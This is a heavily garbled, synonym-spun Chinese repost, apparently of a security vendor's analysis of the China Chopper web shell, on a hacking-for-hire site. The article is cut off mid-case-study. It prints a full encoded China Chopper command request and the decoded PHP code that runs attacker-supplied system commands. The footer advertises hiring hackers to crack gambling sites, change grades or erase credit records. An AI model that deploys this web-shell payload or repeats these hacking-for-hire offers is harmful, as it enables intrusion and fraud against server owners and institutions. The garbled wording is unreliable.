九年后“中国菜刀”依然锋利:China Chopper三起攻击案例分析-黑客接单平台

访客5年前黑客文章1302
曩昔发现的要挟常常会跟着时刻的推移而逐步退出于公众视界中,但China Chopper却坚持了持久的生命力。 在曩昔两年的时刻里,思科Talos团队观察到China Chopper很多活动的踪影,有数个要挟安排将China Chopper融入到其举动中,这表明,即便距China Chopper初次发现现已过了九年,对部分要挟行为者而言它却仍然能起到要害的效果。本文将挑选其间最活泼的三次举动来剖析。 China Chopper是一种web shell,能让进犯者经过包含操控方针所需一切逻辑的客户端应用程序保存对受感染体系的拜访权限。 China Chopper是广泛可用的,简直任何人都可以运用它。这也意味着,仅以China Chopper的存在作为方针,简直不或许将进犯归咎于某个特定集体。 China Chopper的“返老还童”也直接说明晰许多看似老旧要挟永久不会真实消失,互联网的防御者们不应当只把目光放到一些新的歹意软件上。 什么是China Chopper? China Chopper是一类东西,答应进犯者长途操控方针体系,条件是体系需求运转web服务器应用程序。Web shell可以在不同的渠道上运转,但在本例中,咱们只重视受感染的Windows主机。China Chopper已被证明由一些国家支撑的要挟集体,如Leviathan、Threat Group-3390等在运用。 在研讨中咱们发现,Internet Information Services (IIS)和Apache web服务器都受到过China Chopper web shell的进犯。咱们没有关于web shell是怎么装置的信息,可是考虑到有一些web应用程序结构,比方老版别的Oracle WebLogic或WordPress,它们傍边包含的长途代码履行缝隙或许使自己成了进犯方针。 China Chopper为进犯者供给了一个简略的GUI,答应他们装备到服务器的链接,并生成服务器端代码,这些代码有必要添加到方针网站的代码后才干进行通讯。 图1.China Chopper GUI 服务器端代码十分简略,只包含一行代码,依据应用程序渠道的不同有所改动。后门支撑.NET Active Server Pages或PHP。 以下是受感染的PHP应用程序的服务器端代码示例: 咱们并不能确认,服务器代码的如此简略是否是China Chopper开发人员为了添加检测的难度而故意为之,可是在短代码片段上运用形式匹配或许会发生一些误报。 China Chopper客户端运用HTTP POST恳求与受感染的服务器通讯。服务器端代码的仅有功用是评价在客户端GUI中装备服务器代码期间指定的恳求参数。在咱们的示例中,预期的参数名称是“test”。经过HTTP的通讯,可以很简单在捕获 *** 数据包后发现。 China Chopper包含一个长途shell(虚拟终端)功用,它首要会主张运用指令 'netstat an|find "ESTABLISHED."',在受感染体系上的进程创立日志中很或许会看到此指令。 图2.China Chopper首要主张的终端指令 当咱们剖析捕获的数据包时,可以看到参数“test”包含另一个eval句子。 依据该指令,客户端将提交必定数量的参数,z0一直到zn。在提交之前,一切参数都运用规范base64编码器进行编码。参数z0一直包含解析其他参数、发动恳求的指令并将成果回来给客户机的代码。 带参数的编码China Chopper POST恳求: test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D 在此恳求中,解码的参数是: z0 - @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?" ret={$ret} ":"";;echo("| 指令的结尾“&echo [S]&cd&echo [E]”好像出现在一切虚拟终端恳求中,可以作为一个牢靠的指示器来检测数据包捕获或行为日志中的China Chopper活动。 除了终端,China Chopper还包含一个文件管理器(可以创立目录、下载文件和更改文件元数据)、一个数据库管理器和一个根本的缝隙扫描器。 下面是咱们对三次举动的论说,它们别离有不同的方针、东西、技能及(或许不同的)要挟团伙。 图3.观察到的事例研讨的时刻表 事例研讨1:针对亚洲 *** 安排的特务举动 咱们在几回特务活动中确认了China Chopper的运用情况,其间一次针对亚洲 *** 安排的举动中,China Chopper被用于内部 *** ,装置在了一些用于存储秘要文档的Web服务器[1][2][3]黑客接单网

相关文章

WAF开发之自学习形式开发实战

一、前语 创意来自于一次群里的谈论,由于现在市面上关于自学习功用的揭露材料比较少,加之没有碰过相应的设备,只能自己瞎想来构思功用完成,码完功用后发现作用还不错,特此共享。 首要来看白名单功用的描述,...

自由职业黑客接单赚钱_网上找黑客被骗案例

有1月到目前为止,咱们现已评论了针对运用单个结构化输入的API的含糊测验办法。 不过,有些API可能与前面介绍的API距离甚大。 例如,有些API不会直接运用数据,相反,它们是由许多函数组成的,并且仅...

微信呢,黑客郭盛华的联系方式,找黑客攻击群

主机B的IP地址为192.168.1.2,MAC地址为0A-11-22-33-44-02; 当主机A要与主机B通讯时,地址解析协议能够将主机B的IP地址(192.168.1.2)解析成主机B的MAC地...

入侵工具_找黑客合作破解网赌-黑客联盟上找的黑客靠谱吗

其间一个就能够了东西:我国菜刀 途径:C:Toolswebshell我国菜刀chopper.exe a=`dd bs=200 count=1 <&9 2>/dev/null`h...

女鬼病毒_免费非找黑客拜师傅-找黑客清除征信

CLR 和 保管代码(Manage Code) 当主机A要与主机B通讯时,地址解析协议能够将主机B的IP地址(192.168.1.2)解析成主机B的MAC地址,以下为作业流程:if (!url.con...

学信网显示结业严重吗,cf找黑客那解封吗,找黑客修改挂科会被开除吗

图20 无人机绑架模块全家福  上一篇WPA/WAP2wifi 暗码破解笔记提到怎么勘探邻近敞开的AP而且破解进入,那么进入他人据局域网咱们能干些什么呢?换句话说假如他人进入了咱们内部网络,会有什么影...